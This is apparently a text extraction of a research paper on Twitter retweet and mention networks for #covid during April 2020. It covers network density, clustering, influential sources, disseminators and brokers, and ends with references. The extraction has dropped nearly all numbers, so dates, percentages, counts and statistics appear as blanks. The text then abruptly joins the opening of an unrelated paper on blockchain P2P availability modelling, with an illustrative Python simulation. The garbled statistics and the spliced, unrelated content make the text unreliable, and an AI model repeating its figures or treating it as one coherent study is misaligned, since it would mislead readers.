discussions of existing topics by making the tweets visible in twitter search. the use of a hashtag on twitter indicates self-association of a user with an issue (gruzd et al., ; gleason, ). as users interact in the twitter space, they form connections that emerge into complex social network structures. essentially, the connections are asymmetric, since a user who is retweeted or mentioned by another user does not necessarily have to reciprocate by retweeting or mentioning them back. due to this asymmetry, users can re-create and reinforce traditional hierarchical network structures in twitter by relying on just a few information sources or by choosing to limit interactions to a select group of similar others (himelboim et al., ). thus, the connections built among users are indicators of information sharing, and network structures reflect patterns of information flow (himelboim et al., ; majmundar et al., ). many studies have examined the structure of communication networks on twitter and provide insights about information flow during political campaigns and social movements (himelboim et al., ; ansari, ; harris et al., ; kruikemeier, ; shin et al., , ; recuero et al., ). the patterns of communication and influential groups can vary across topics, cultures, or languages. although a few recent studies investigated ebola information dissemination patterns (harris et al., ; liang et al., ), their analysis was limited to the retweet network, which together with the mention network can provide an understanding of information flow on twitter (conover et al., ).
to the best of our knowledge, this is the first study to examine both the retweet and mention networks to understand the diffusion of health information on twitter among americans during a pandemic. structural characteristics were examined at the network level to address our overarching research question: is the current twitter covid- communication network effectively leveraged to facilitate the flow of valid information during this crisis? information can diffuse most effectively during crises if the network is sufficiently dense with low rates of clustering (himelboim et al., ). ideally, the twitter covid- communication network would have a large audience and spread information quickly. thus, we evaluated information flow in the retweet and mention networks with particular attention paid to connectivity, modularity, and the direction of information flow. influential covid- twitter users were identified as information sources, disseminators, and brokers. ideally, covid- information sources would be medical/health professionals to emphasize credibility, disseminators would be communication/journalism professionals to maximize reach, and brokers would be public health and government officials to ensure that information is accurate and continues to flow (world health organization, ; centers for disease control and prevention, ). thus, the aim of this study was to determine the characteristics of covid- twitter users by comparing their professional categorization across their roles as sources, disseminators, or brokers in the retweet and mention networks. we hope this study will significantly contribute to public health by helping devise more effective emergency communication strategies and ultimately help mitigate the spread of disease and reduce misinformation.

methods
data
we retrieved all publicly available tweets and user information from april , , : : am, to april , , : : am, gmt (utc + ), using the twitter api with the query "contains: #covid and country code: usa and language: english." this time period was chosen because the u.s. became the nation with the highest number of deaths due to covid- on april and it was predicted that the highest u.s. daily death rate would occur on april . we selected am (instead of midnight) as the temporal boundary between days because the number of tweets started increasing around am and reached its peak around pm each day. figure shows the distribution of the tweets that used #covid during the study period. the twitter users' usernames, tweets, hashtags, retweet and mention relationships, and self-descriptions were collected. we did not include replies, to reduce the likelihood of repetition, losing context information, or producing unreliable data caused by twitter's new feature, "hide reply."

construction of retweet and mention networks
the data were converted into social network format using the r package "rtweet" (kearney, ). we constructed retweet and mention networks as previously reported (yang and counts, ; harris et al., ; takeichi et al., ; himelboim et al., ). in the retweet network, each node represents a twitter user and a directed edge is attached from user b to user a if user b retweets a tweet originally posted by user a. the mention network was constructed in the same manner based on @username mentioning. that is, a directed edge is constructed from b to a if user b mentions user a in their tweet. the opposite directions of edges in these networks therefore represent potential pathways for information flow.
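as a rough illustration of this edge construction (a minimal sketch, not the authors' code; the record layout and the field names "user", "retweet_of", and "mentions" are hypothetical placeholders), the two directed networks could be assembled with networkx as follows:

```python
# minimal sketch of building retweet and mention networks from tweet records
import networkx as nx

tweets = [
    {"user": "b", "retweet_of": "a", "mentions": []},
    {"user": "c", "retweet_of": None, "mentions": ["a", "d"]},
]

retweet_net = nx.DiGraph()
mention_net = nx.DiGraph()

for t in tweets:
    if t["retweet_of"]:
        # edge from the retweeting user to the original author
        retweet_net.add_edge(t["user"], t["retweet_of"])
    for m in t["mentions"]:
        # edge from the mentioning user to each mentioned user
        mention_net.add_edge(t["user"], m)

# information is assumed to flow along the reverse of these edges,
# i.e. from the retweeted/mentioned user back to the retweeter/mentioner
information_flow = retweet_net.reverse(copy=True)
```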
figure shows (a) how we built the networks and (b) how information is spread in the networks. these two network datasets contained a total of , , directed relationships (ties) from , users (nodes). the r package "igraph" (csardi and nepusz, ) was used to calculate network-level and user-level metrics, to identify overall network structures and influential users, and to provide insights into information flow. analyses were conducted on the whole three-day set, separately on the retweet and mention networks, in order to compare them. the networks were visualized using the library "networkx" (hagberg et al., ) for the python programming language. in order to focus on detailed elements and to give a spatial understanding of social relations (i.e., segregation, interaction, and clustering), smaller networks were created using one-hour subsets of the data (martin iii, ; moody et al., ). the time period of april , , : : pm to : : pm, gmt (utc + ), was chosen for the subset to display because it provided a finer representation of network structures than other time periods and it had the largest amount of information for both retweet and mention networks that our lab computers could analyze. the subset network's structure was representative of the whole network. initial visualizations were attempted on each one-hour subset individually and the results were very similar, so the finest representation was included in the current study. the coefficient of variation (cv) was calculated for each of the network measures: cvs for degree centrality were . for the retweet and . for the mention networks across one-hour subsets; cvs for density were . for the retweet and . for the mention networks across one-hour subsets, respectively. this indicates the network metric values for the separate one-hour slices are relatively similar.

figure : volume of #covid tweets from april , , : : am, to april , , : : am, gmt (utc + ), with minute time intervals.

network level
understanding the overall structure of a network is key for understanding how information flows among its users (hinds and mcgrath, ; hossain and kuti, ; valente, , ). typical network-level metrics are size, average path length, network diameter, rates of reciprocity and transitivity, density, as well as clustering measured as the degree of modularity and the network average clustering coefficient. twitter users often form clusters composed of users who are more interconnected among themselves than with others in the network. within clusters, information tends to flow fast, while across clusters information flow is often restricted by the limited connectivity available between clusters. we identified clusters using the clauset–newman–moore algorithm to define the boundaries of information flow (clauset et al., ). modularity of each network was computed to measure the interconnectedness of clusters using the girvan–newman algorithm (girvan and newman, ). higher scores indicated that the clusters are more distinct or separated from one another (range =clusters completely overlap to =no connections between clusters). while modularity captures the extent to which clusters are distinct from one another, it is often unable to detect small clusters (fortunato and barthelemy, ; kaalia and rajapakse, ).

figure : toy networks: (a) retweet and mention networks; (b) information diffusion network; (c) influential user identification in the retweet and mention networks.
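the following sketch (an assumption-laden illustration, not the authors' igraph pipeline) shows the kind of network-level summary described above computed with networkx; clauset–newman–moore clustering is applied to an undirected view of the directed graph:

```python
# illustrative network-level summary for a directed graph G; not the paper's code
import networkx as nx
from networkx.algorithms import community

def network_summary(G: nx.DiGraph) -> dict:
    und = G.to_undirected()
    # clauset-newman-moore greedy modularity clustering on the undirected view
    clusters = community.greedy_modularity_communities(und)
    # path-based metrics are only defined on a connected component
    giant = und.subgraph(max(nx.connected_components(und), key=len))
    return {
        "nodes": G.number_of_nodes(),
        "edges": G.number_of_edges(),
        "density": nx.density(G),
        "reciprocity": nx.reciprocity(G),
        "transitivity": nx.transitivity(und),
        "avg_clustering": nx.average_clustering(und),
        "n_clusters": len(clusters),
        "modularity": community.modularity(und, clusters),
        "diameter_gcc": nx.diameter(giant),
        "avg_path_length_gcc": nx.average_shortest_path_length(giant),
    }
```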
to investigate the network in more depth, density between clusters was calculated as the sum of existing ties between two clusters divided by total possible number of ties between them (range =no connection to =complete connection). user level in-degree, out-degree, and betweenness centrality metrics were used to identify influential users (freeman, ; valente, ). although there is no fixed ratio or standard approach to identify the number of influential users in a given network, top users with highest centrality scores or more has been considered enough to provide an indication of major direction of information flow in previous studies (anger and kittl, ; himelboim et al., ; recuero et al., ; giglou et al., ). given the large size of our data, this study identified a total of influential users from the retweet and mention networks. on twitter, retweets and mentions are sent from one user to another. the predominant direction of such connections determines the information flow. in-degree centrality measures the number of times a user received retweets or mentions and those with high in-degree indicate the user is a major source of information for others (yang and counts, ; morris et al., ; littau and jahng, ). thus, we identified users who had the top in-degree scores in each network as information sources. out- degree centrality measures the number of outgoing connections a user has. if a user frequently retweets or mentions other users, the user will have high out- degree, and high out-degree will indicate the user is an initiator of large proportions of ties. thus, we identified users who had the top out-degree centrality scores in each network as information disseminators. betweenness centrality measures the frequency a user lies on the shortest path between other users (freeman, , ). a user with high betweenness has more information passing through them and a higher number of other people depend on that user to get information, and without that user, groups of people will be much less connected. thus, we can use this metric to find users who are communication controllers in a given network. we identified users who had the top betweenness centrality scores in each network as information brokers. we assume that all of the connections in these networks can diffuse information equally and so centrality measures were not weighted. during public health emergencies, health professionals have an important role to ensure the quality of shared information; likewise, the roles of communication professionals to timely disseminate the information with clear directions and of government officials to manage and maintain information flow are crucial in mitigating the effects of a pandemic (world health organization, ; centers for disease control and prevention, ). interaction and cooperation between health professionals, communication professionals, and the government are critical during a pandemic (world health organization, ; centers for disease control and prevention, ). after identifying the information sources, disseminators and brokers, a conceptual assessment was conducted to under stand the nature of influential users in the retweet and mention networks. regarding the nature of users, we classified the users into four types, based on their self-descriptions. healthcare providers and researchers/scientists were classified as health professionals. 
people who disseminate news and information to serve the public interest, such as media broadcasters, journalists, and reporters, were classified as communication professionals. politicians, policy makers, and national agencies were classified as government officials. public figures and all other ordinary individuals who are simply using twitter to share personal views were classified as non-professionals. the user type classification results were compared across roles and across networks using fisher's exact test.

results
network level
the retweet network had , ties from , users, whereas the mention network had , ties from , users. overall, covid- information was not transmitted efficiently. in both networks, information flowed in one direction; the flow was slow; both retweet and mention networks were sparse and consisted of many small clusters; the clusters were disconnected from each other; and shared information was less likely to reach the entire group. both networks exhibited quite similar structures. table summarizes metrics from the network-level analyses. in both retweet and mention networks, low levels of mutuality of connections among users indicated that the information flow is unidirectional: retweet network, reciprocity= . % and transitivity= . %; and mention network, reciprocity= . % and transitivity= . %. both networks exhibited long average path lengths, implying information may diffuse slowly and less evenly: on average, users were separated by others in the retweet network and others in the mention network. both networks were divided into a large number of clusters: , clusters in the retweet network and , clusters in the mention network. information was not likely to be shared between clusters: the average clustering coefficients calculated for each network were . in the retweet network and . in the mention network. users had dense connections with other users within clusters but sparse connections with users in different clusters: although it was slightly lower in the retweet network, both networks revealed high modularity, with scores of . in the retweet network and . in the mention network. both retweet and mention networks showed very low density: density scores were . in the retweet network and . in the mention network.

user level
degree analyses revealed that a very small number of users determined the major covid- information flow in both retweet and mention networks. the degree distributions in both networks tended to be scale-free, suggesting a hierarchical structure. the in-degree values of all users in the retweet network ranged between and , (n= , , m= . , med= ), the out-degree values between and (n= , , m= . , med= ), and the betweenness values between and , , (n= , , m= , . , med= ). in the mention network, the in-degree values of all users ranged between and , (n= , , m= . , med= ), the out-degree values between and (n= , , m= . , med= ), and the betweenness values between and , , (n= , , m= , . , med= ). all degree distributions were highly right-skewed: retweet network, skewness and kurtosis scores were . and , . for in-degree, . and . for out-degree, and . and , . for betweenness; mention network, . and , . for in-degree, . and . for out-degree, and . and , . for betweenness.
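a minimal sketch (assuming the networkx graphs above; the cut-off k stands in for the unspecified number of top users selected in the study) of how sources, disseminators, and brokers could be ranked by unweighted centrality:

```python
# ranking candidate sources, disseminators, and brokers by unweighted centrality;
# k is a placeholder, not the cut-off actually used in the study
import networkx as nx

def influential_users(G: nx.DiGraph, k: int) -> dict:
    def top_k(scores: dict) -> list:
        return sorted(scores, key=scores.get, reverse=True)[:k]

    return {
        # high in-degree: frequently retweeted/mentioned -> information sources
        "sources": top_k(dict(G.in_degree())),
        # high out-degree: frequently retweets/mentions others -> disseminators
        "disseminators": top_k(dict(G.out_degree())),
        # high betweenness: lies on many shortest paths -> brokers
        "brokers": top_k(nx.betweenness_centrality(G)),
    }

# usage: influential_users(retweet_net, k=50)  # 50 is an arbitrary example value
```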
the in-degree of the identified information sources (top ) in the retweet network was between and , (n= , m= , , med= , ), the out-degree of the identified information disseminators was between and (n= , m= , med= ), and the betweenness of the identified information brokers was between , , and , , (n= , m= , , , med= , , ). in the mention network, the in-degree of the identified information sources was between and , (n= , m= , , med= , ), the out-degree of the identified information disseminators was between and (n= , m= , med= ), and the betweenness of the identified information brokers was between , , and , , (n= , m= , , , med= , , ). table compares the summary statistics of the degree distributions of influential users and of all users. both networks followed a power-law degree distribution, providing evidence of scale-free, hierarchical structures: in-degree α= . , r = . , p< . and out-degree α= . , r = . , p< . were calculated in the retweet network; in-degree α= . , r = . , p< . and out-degree α= . , r = . , p< . were calculated in the mention network. figure shows the scale-free in- and out-degree distributions on a log–log scale with the raw score distributions as histograms.

figure : scale-free in-degree and out-degree distributions on a log–log scale for the retweet and mention networks. note: users with a degree score > are not shown in the histograms.

the user type classification results revealed that, in both networks, the major covid- information being shared among twitter users was primarily authored by non-professionals and government officials; the information was primarily disseminated by non-professionals; and health professionals played a major role in brokering information. the classified types of influential users in different roles in each network were all statistically significantly different from one another (all ps< . ). a significant difference across networks was observed in the composition of the identified information brokers at α= . : brokers in the retweet network were most frequently healthcare providers and ordinary citizens, with a near absence of government officials, whereas brokers in the mention network were most often research scientists followed by healthcare workers. table summarizes the results of the user-level analyses. table shows the p-values obtained from the user type composition comparison across roles and across networks using fisher's exact test.

table . network metrics for the retweet and mention networks: number of nodes, number of edges (directed), diameter (largest connected component), average path length, reciprocity, transitivity, number of clusters, average clustering coefficient, modularity, and density for each network.

table . centrality statistics (n, mean, sd, median, min., max., skewness, and kurtosis of in-degree, out-degree, and betweenness) for influential users and all other users in both networks.

retweet network
information sources, the top on in-degree, were almost evenly divided among the four user types: health professionals, %; communication professionals, %; government officials, %; and non-professionals, %. in contrast, information disseminators, the top on out-degree, were predominately non-professionals, % (with % of them being ordinary people), and a handful of communication professionals, %. information brokers, the top on betweenness, were predominately health professionals, % (with most being healthcare providers, %), with non-professionals being most of the remainder, %.

mention network
the mention network followed a similar pattern, with information sources being almost evenly divided among the four user types: health professionals, %; communication professionals, %; government officials, %; and non-professionals, %. information disseminators, as in the retweet network, were predominately non-professionals, % (with % of them being ordinary people), and a handful of communication professionals, %. information brokers were predominately health professionals, %, although in this case these health professionals were more likely to be researchers/scientists ( %); government officials ( %) and communication professionals ( %) made up most of the remainder.

table . occupations of influential users (information sources, information disseminators, and information brokers) in the retweet and mention networks, broken down by health professionals (healthcare providers; researchers/scientists), communication professionals (media broadcasters; journalists/reporters), government officials (politicians/policy makers; national agencies), and non-professionals (public figures; ordinary individuals).

visualization
the one-hour subset data for the retweet network visualization consisted of , ties from , users. the subset data for the mention network visualization consisted of , ties from , users. figure visually depicts the structures and information flow of the retweet and mention networks. the size and color of the nodes were made proportional to the unweighted in-degree centrality score of each user. the ties between users represented the information exchange links between the users. directions of ties were ignored. attention was focused on the overall degree distribution and the connectivity between high-degree users (information sources) and lower-degree users to help reveal the overall network structure and information flow. spatialization was used to draw nodes with more ties in more central positions. in both networks, a hierarchical structure was apparent and information flow was concentrated at the center, where influential users are located. a significant portion of users in both networks were connected to only a few others, whereas a few users had a huge proportion of connections. both networks exhibited a large core cluster, comprised of a small number of high-degree users – represented by bigger and brighter nodes in the figure – surrounded by a large number of less influential users and small clusters. in both networks, information brokers played a central role in information diffusion; connections between more influential users and less influential users were mediated by other users or clusters. in the retweet network, dense interconnections among influential users, connecting each of their clusters with another, were observed.

implications
despite twitter's reputation as an effective medium to connect people and facilitate public communication, the topic of covid- did not bring its users together. both the retweet and mention networks were sparsely connected, exhibiting a large number of small distinct clusters. a study by kaur and singh ( ) reported that disconnected networks often result from distrust in information sources. consistent with their finding, more than half of the covid- information was generated by non-professional users, increasing the likelihood of encountering false information and thereby potentially spreading misinformation. moreover, dominant involvement of non-professional users was observed in the information dissemination process. in both the retweet and mention networks, communication professionals were only marginally involved and there were almost no health professionals among the disseminators. since publicly shared information has a direct impact on the development of public behaviors, it is very important to consider the type of people who act as information disseminators during medical crises (hilton and hunt, ; staniland and smith, ). findings by keshvari et al. ( ) warned about biased and misleading content that ordinary people, who are not trained to objectively perceive risks and benefits, disseminate with personal speculations and interpretations during epidemics. communication professionals, on the other hand, are trained to investigate all possible aspects and implications of information before promoting it. in this process, communication professionals are often dependent on health professionals to substantiate facts and provide balance by ensuring pluralistic aspects and implications of the pandemic (ahlmén-laiho et al., ).
increasing willingness on the part of communication professionals to disseminate accurate information and to cooperate with health professionals may be critical to control the spread of dis/misinformation and prevent public confusion. in both the retweet and mention networks, information flow was highly concentrated within a core cluster comprised of a few influential users and their own clusters; information flow to the rest of the network (the other clusters) was severely restricted due to the limited connectivity. this suggests that the networks facilitate the diffusion of covid- information if brokers integrate with their communities and clusters. in the context of social media communications, the limited connectivity between clusters means that networks would break into isolated components, separated by redundant and unnecessary information, and that information will, more often than not, be trapped within its own cluster. brokers, on the other hand, create paths for information diffusion and make global information flow easier to attain, if and when they are activated (gonzález-bailón and wang, ).

table . p-values from fisher's exact test comparing occupations across user roles (information sources, information disseminators, information brokers) and between networks (retweet, mention, retweet vs. mention).

in a pandemic, a balanced approach to centralized control and management of information is critical in helping public audiences understand the threat and what actions should be taken (homeland security council (us), ; department of homeland security, ). government officials must take a proper course of action as information brokers so that information is complete, valid, and reliable (homeland security council (us), ; department of homeland security, ). unfortunately, however, that was not happening in twitter's covid- communication network. neither the retweet network nor the mention network showed enough influence of government officials as information brokers; in both networks, information flow was primarily maintained by health professionals. developing social media communication guidelines for officials and national agencies that offer a starting point to foster connections, and training to control or promote information flow, may help ensure effective information flow and make necessary information timely and accessible to those who need it in the process of emergency response.

both the retweet and mention networks exhibited a scale-free hierarchical structure with unidirectional information flow. due to the preferential attachment a small number of influential users receive, such network structures can be much more effective at rapid information diffusion for timely response and national solidarity during crises (himelboim et al., ; de brún and mcauliffe, ); because a small number of influential users can command a large and disproportionate number of other users, and those users in turn affect all the other users in their local network, a whole subsystem can be covered in just a few steps, making it relatively easy to keep everyone informed of relevant information such as risks and action items. at the same time, however, such network structures can also be vulnerable to false information, and diffusion can be easily distorted by the absence of just one or a few influential users from the network (lossio-ventura and alatrista-salas, ; de brún and mcauliffe, ); for instance, if one or two influential users were removed or left the network, it would leave a major gap in support for most users, thus interrupting information flow; similarly, a single piece of misinformation can be a risk factor for the entire system because of the fast nature of information dissemination. monitoring information flow and ensuring that the public can rely on a consistently valid source of information via controlled channels at all stages of pandemic communication planning may help the emergency communication network be more resilient and stable.

figure : graphs of the #covid retweet and mention networks (april , , – pm, gmt (utc + )).

the visualization results suggested that influential users in the retweet and mention networks may have different reasons to engage in covid- communication. different interaction patterns and preferences in interaction form in twitter networks have previously been shown to result in part from differences in the type of messages, which may reflect the reasons users engage in the communication (conover et al., ; himelboim et al., ). conover et al. ( ) found that, in twitter's political discourse, where the retweet network was highly polarized while the mention network was not, users tended to retweet other users whom they agreed with politically, while they more frequently interacted with users whom they disagreed with using mentions, to argue or share their views. covid- 's retweet and mention networks did not exhibit the same connectivity among users. interacting closely, influential users in the retweet network shared information with each other, and the interactions among influential users facilitated less influential users' access to information by connecting each of their clusters in the network. in contrast, the absence of interactions among influential users in the mention network led to more limited information flow across clusters. studies are needed to investigate whether and how differences in information flow tendencies in health communication represent differences as a function of information type.

limitations
this study has some noteworthy limitations. data collection was restricted to english messages, which may limit generalizability to other languages. the study was unable to access private networks – only publicly available tweets were retrieved for the analyses. although a majority of twitter users ( %) reported they keep their accounts public (wojcik and hughes, ), the findings may not reflect the characteristics and attitudes of private users. many additional aspects of information diffusion regarding the topic of covid- were not captured by the indicators of information sharing – retweets and mentions. for example, the current study did not include the follower–followee structure, since it has been reported that influential users are those who have an active audience who mentions or retweets them, rather than those with a large number of followers (cha et al., ), and the number of followers/followees does not fully explain users' actual activities (hamzehei et al., ); however, it may be possible that this structure explains other aspects, such as the impact of the information shared.
the current version of the twitter api does not store users who retweet retweeters. a prior study on information spread on the retweet network identified that most ( %) of retweets are directly retweeted from the initial message (liang et al., ). however, the unavailability of the full content record may prevent us from further knowing the pattern of information diffusion among intermediate retweeters. there are no comparable analyses to determine whether cut-off values of network indices are high or low; thus, our only basis was our own interpretation of the data. social networks are often only weakly scale-free even in cases where a power-law distribution is observed (broido and clauset, ). future research should investigate the robustness of the scale-free structures and the interpretability of the power-law distribution. drawing inferences solely based on a visual inspection requires further statistical confirmation.

conclusion
this study examined the covid- communication network on twitter to provide insights about health information flow among americans during a pandemic. structural characteristics of the retweet and mention networks were quantified and described with different metrics (size, density, connectivity, modularity). influential users (information sources, disseminators, brokers) in each network were identified and the nature of the influential users was conceptually assessed. results showed that in both retweet and mention networks, the topic of covid- fragmented the large twitter population into multiple communication channels, each with its own audience and information sources. the study also found an absence of reliable sources, of disseminators that can provide timely, accurate information, and of proper management of information flow. these results have implications for understanding and predicting information diffusion in urgent public health communication. overall, the findings emphasized the importance of connecting users to essential resources and of distinguishing credible information among the huge amount of information being shared. as social media becomes a more heavily used news source, the effectiveness of crisis management depends more on the type of information shared among its users and on user reachability in the network. our work opens several new questions about the underlying structures of social media communication networks. future studies may expand this research, exploring how user clusters are formed and examining how relationships between information type and degree of influence differ by cluster or change over time.

references
ahlmén-laiho, u., suominen, s., järvi, u. and tuominen, r. . "finnish health journalists' perceptions of collaborating with medical professionals", international conference on well-being in the information society, springer, cham, pp. – . anger, i. and kittl, c. . "measuring influence on twitter", proceedings of the th international conference on knowledge management and knowledge technologies, pp. – . ansari, a. . "green's art: new media aesthetics in pre- and post-election events in iran", proceedings of the th international symposium of electronic art, edited by k. cleland, l. fisher, and r. harley, isea international, the australian network for art & technology, and the university of sydney, sydney. aramburu, m. j., berlanga, r. and lanza, i. . social media multidimensional analysis for intelligent health surveillance. international journal of environmental research and public health : . broido, a. d.
and clauset, a. . scale-free networks are rare. nature communications : – . centers for disease control and prevention. . crisis and emergency risk communication (cerc) manual, centers for disease control and prevention, atlanta, available at: https://emergency.cdc.gov/cerc/ manual/index.asp. cha, m., haddadi, h., benevenuto, f. and gummadi, p. k. . measuring user influence in twitter: the million follower fallacy. icwsm, : . clauset, a., newman, m. e. and moore, c. . finding community structure in very large networks. physical review e : , doi: . / physreve. . . conover, m. d., ratkiewicz, j., francisco, m., gonçalves, b., menczer, f. and flammini, a. . political polarization on twitter. fifth international aaai conference on weblogs and social media. csardi, g. and nepusz, t. . the igraph software package for complex network research. interjournal complex systems : – . de brún, a. and mcauliffe, e. . social network analysis as a methodological approach to explore health systems: a case study exploring support among senior managers/executives in a hospital network. international journal of environmental research and public health : . department of homeland security . countering false information on social media in disasters and emergencies: social media working group for emergency services and disaster management. fortunato, s. and barthelemy, m. . resolution limit in community detection. proceedings of the national academy of sciences : – , available at: https://doi.org/ . /pnas. . freeman, l. c. . a set of measures of centrality based on betweenness. sociometry : – , available at: https://doi.org/ . / . freeman, l. c. . centrality in social networks: conceptual clarification. social networks : – . giglou, r. i., d’haenens, l. and van gorp, b. . “identifying influential users in twitter networks of the turkish diaspora in belgium, the netherlands, and germany”, handbook of research on politics in the computer age, igi global, pp. – . girvan, m. and newman, m. e. . community structure in social and biological networks. proceedings of the national academy of sciences : – . gleason, b. . #occupy wall street: exploring informal learning about a social movement on twitter. american behavioral scientist : – . gonzález-bailón, s. and wang, n. . networked discontent: the anatomy of protest campaigns in social media. social networks : – . gruzd, a., wellman, b. and takhteyev, y. . imagining twitter as an imagined community. american behavioral scientist : – . hagberg, a., swart, p. and s chult, d. . exploring network structure, dynamics, and function using networkx(no. la-ur- - ; la-ur- - ) los alamos national lab. (lanl), los alamos, nm. hamzehei, a., jiang, s., koutra, d., wong, r. and chen, f. . topic-based social influence measure- ment for social networks. australasian journal of infor- mation systems : . harris, j. k., duncan, a., men, v., shevick, n., krauss, m. j. and cavazos-rehg, p. a. . peer reviewed: messengers and messages for tweets that used #thin- spo and #fitspo hashtags in . preventing chronic disease , e , doi: . /pcd . . harris, j. k., moreland-russell, s., choucair, b., mansour, r., staub, m. and simmons, k. . tweeting for and against public health policy: response to the chicago department of public health’s electronic cigarette twitter campaign. journal of medical internet research : e . hilton, s. and hunt, k. . uk newspapers’ representations of the – outbreak of swine flu: one health scare not over-hyped by the media?. journal of epidemiology and community health : – . 
covid- twitter network himelboim, i., lariscy, r. w., tinkham, s. f. and sweetser, k. d. . social media and online political communication: the role of interpersonal informational trust and openness. journal of broadcasting & electronic media : – . himelboim, i., smith, m. a., rainie, l., shneiderman, b. and espina, c. . classifying twitter topic- networks using social network analysis. social media+ society . hinds, p. and mcgrath, c. . structures that work: social structure, work structure and coordination ease in geographically distributed teams. proceedings of the th anniversary conference on computer supported cooperative work, pp. – . homeland security council (us) . national strategy for pandemic influenza: implementation plan. executive office of the president. hossain, l. and kuti, m. . disaster response preparedness coordination through social networks. disasters : – . kaalia, r. and rajapakse, j. c. . refining modules to determine functionally significant clusters in molecular networks. bmc genomics : . kaur, m. and singh, s. . analyzing negative ties in social networks: a survey. egyptian informatics journal : – . kearney, m. w. . rtweet: collecting and analyzing twitter data. journal of open source software : . kemp, s. . digital : april global statshot, available at: https://datareportal.com/reports/digital- -april-global-statshot (accessed may , ). keshvari, m., yamani, n., adibi, p. and shahnazi, h. . health journalism: health reporting status and challenges. iranian journal of nursing and midwifery research : . kruikemeier, s. . how political candidates use twitter and the impact on votes. computers in human behavior : – . liang, h., fung, i. c. h., tse, z. t. h., yin, j., chan, c. h., pechta, l. e. and fu, k. w. . how did ebola information spread on twitter: broadcasting or viral spreading?. bmc public health : . littau, j. and jahng, m. r. . interactivity, social presence, and journalistic use of twitter. # isoj journal : – . lossio-ventura, j. a. and alatrista-salas, h. (eds), . information management and big data: second annual international symposium, simbig , cusco, peru, september - , , and third annual international symposium, simbig , cusco, peru, september - , , revised selected papers (vol. ), springer. majmundar, a., allem, j. p., cruz, t. b. and unger, j. b. . the why we retweet scale. plos one : e , available at: https://doi.org/ . /journal. pone. . martin, j. g. iii . visualizing the invisible: application of knowledge domain visualization to the longstanding problem of disciplinary and professional conceptualization in emergency and disaster manage- ment. universal-publishers, charles town, ma. matsa, k. e. and shearer, e. . news use across social media platforms . pew research center. moody, j., mcfarland, d. and bender-demoll, s. . dynamic network visualization. american journal of sociology : – . morris, m. r., counts, s., roseway, a., hoff, a. and schwarz, j. . tweeting is believing? understanding microblog credibility perceptions. proceedings of the acm conference on computer supported cooperative work, pp. – . recuero, r., zago, g. and soares, f. . using social network analysis and social capital to identify user roles on polarized political conversations on twitter. social media+ society : . shin, j., jian, l., driscoll, k. and bar, f. . political rumoring on twitter during the us presidential election: rumor diffusion and correction. new media & society : – . shin, j., jian, l., driscoll, k. and bar, f. . 
the diffusion of misinformation on social media: temporal pattern, message, and source. computers in human behavior : – . staniland, k. and smith, g. . flu frames. sociology of health & illness : – . takeichi, y., sasahara, k., suzuki, r. and arita, t. . concurrent bursty behavior of social sensors in sporting events. plos one : e . valente, t. w. . network models of the diffusion of innovations, hampton press, cresskill, nj. valente, t. w. . social networks and health: models, methods, and applications, oxford university press. wang, j., cellary, w., wang, d., wang, h., chen, s. c., li, t. and zhang, y. (eds), . web information systems engineering–wise : th international conference, miami, fl, usa, november – , , proceedings (vol. ), springer. wojcik, s. and hughes, a. . sizing up twitter users pew research center, washington, dc. world health organization. . pandemic influenza preparedness and response: a who guidance document, world health organization, geneva. yang, j. and counts, s. . predicting the speed, scale, and range of information diffusion in twitter. th international aaai conference on weblogs and social media (icwsm), : – . zhou, l., zhang, d., yang, c. c. and wang, y. . harnessing social media for health information management. electronic commerce research and applications : – . international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on blockchain availability modeling in p p network wang zan school of computer science and engineering xi’an technological university xi’an, china e-mail: @ .com fu yanfang school of computer science and engineering xi’an technological university xi’an, china e-mail: fuyanfang @aliyun.com zhong lianjiong school of computer science and engineering xi’an technological university xi’an, china e-mail: zhongli @sina.com dai fei school of computer science and engineering xi’an technological university xi’an, china e-mail: @qq.com abstract—blockchain establishes reliable trust among parties that do not know each other and achieves credible data sharing and point-to-point value transmission in an epoch-making way. the requirement of the availability of block chain network becomes more and more important due to the dynamic and changeable characteristics of block chain p p network. therefore, for the characteristics of block chain p p network system, this paper constructs a availability model based on markov stochastic process theory, analyzes the steady-state availability and instantaneous availability of the model, and finally carries out experimental verification through simulation, hoping to provide beneficial inspiration and guidance for future research on block chain network . keywords—blockchain; p p; markov; availability i. introduction block chain is a distributed system composed of encryption mechanism, storage mechanism, consensus mechanism, which can realize the peer-to-peer trading function of mutual trust without central server. the biggest feature of blockchain is decentralization and distribution, and the consensus mechanism of blockchain enables participating nodes to jointly provide services for the system and realizes similar functions of financial intermediaries in the central system. as shown in figure , blockchain system can achieve fast synchronization of data without central server and consistency of consensus mechanism through p p network. p p realizes the sharing of data resources and cooperation of services among terminal devices by means of direct exchange. 
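as an illustration of the centre-free data synchronisation just described, the following sketch simulates flooding-style propagation of a new block through a small p2p overlay; the peer class, topology parameters, and rates are hypothetical and are not taken from the paper.

```python
# Minimal sketch (illustrative only): flooding-style propagation of a new block
# through a P2P overlay, showing how data can synchronise across peers without
# a central server.
import random

class Peer:
    def __init__(self, peer_id):
        self.peer_id = peer_id
        self.neighbors = []        # directly connected peers
        self.known_blocks = set()  # block identifiers this peer has seen

    def receive(self, block_hash):
        """Accept a block once, then relay it to every neighbour."""
        if block_hash in self.known_blocks:
            return                 # already synchronised, stop relaying
        self.known_blocks.add(block_hash)
        for n in self.neighbors:
            n.receive(block_hash)

def random_overlay(num_peers=20, degree=3, seed=42):
    """Connect each peer to a few random neighbours (flat, centre-free topology)."""
    random.seed(seed)
    peers = [Peer(i) for i in range(num_peers)]
    for p in peers:
        for q in random.sample([x for x in peers if x is not p], degree):
            if q not in p.neighbors:
                p.neighbors.append(q)
                q.neighbors.append(p)
    return peers

if __name__ == "__main__":
    peers = random_overlay()
    peers[0].receive("block-0001")   # one peer broadcasts a new block
    reached = sum("block-0001" in p.known_blocks for p in peers)
    print(f"{reached}/{len(peers)} peers synchronised")
```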
